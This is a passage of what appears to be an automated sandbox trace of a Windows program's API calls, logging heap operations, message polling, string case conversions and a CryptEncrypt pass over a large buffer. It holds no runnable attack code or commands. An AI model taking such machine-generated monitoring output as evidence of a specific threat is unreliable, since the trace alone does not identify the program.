| out: hHeap=0x25c0000) returned 1 [0260.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.946] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.947] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xfd98, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xfda0) returned 1 [0260.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.947] CharLowerBuffW (in: lpsz="byte[64928]", cchLength=0xb | out: lpsz="byte[64928]") returned 0xb [0260.947] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.950] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.950] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.950] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.950] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.950] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.950] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.951] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.951] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34b2250*, pdwDataLen=0x8bef68*=0xfd98, dwBufLen=0xfda0 | out: pbData=0x34b2250*, pdwDataLen=0x8bef68*=0xfda0) returned 1 [0260.952] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.952] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.952] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.952] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.953] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.953] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.953] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.953] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0260.953] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.953] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0260.953] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.954] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.954] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0260.954] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.954] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0260.954] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.954] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.954] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.954] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.954] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.954] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.954] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.954] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.954] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.954] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.954] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.955] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.965] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.965] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.965] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.967] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.967] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.967] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0260.967] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.967] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0260.967] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.967] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.968] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.968] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0260.968] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.968] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0260.968] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0260.968] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.968] CryptDestroyKey (hKey=0xaa5920) returned 1 [0260.968] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.968] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.968] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0260.968] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.968] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0260.968] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.968] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.968] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0260.969] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.969] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0260.969] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.969] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.969] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.969] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.970] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.970] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0260.970] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.970] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0260.970] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0260.970] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.970] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.970] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.970] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.971] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.971] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0260.971] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.971] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0260.971] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.971] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.971] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0260.971] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.971] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0260.971] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.971] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.971] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.971] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.971] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.972] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.972] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.972] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.972] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.972] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.972] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.972] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.972] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.972] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.972] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.972] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0260.972] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.972] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0260.972] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.972] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.973] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.973] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0260.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0260.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0260.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0260.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0260.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0260.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0260.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0260.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0260.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0260.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0260.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0260.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0260.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.975] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, 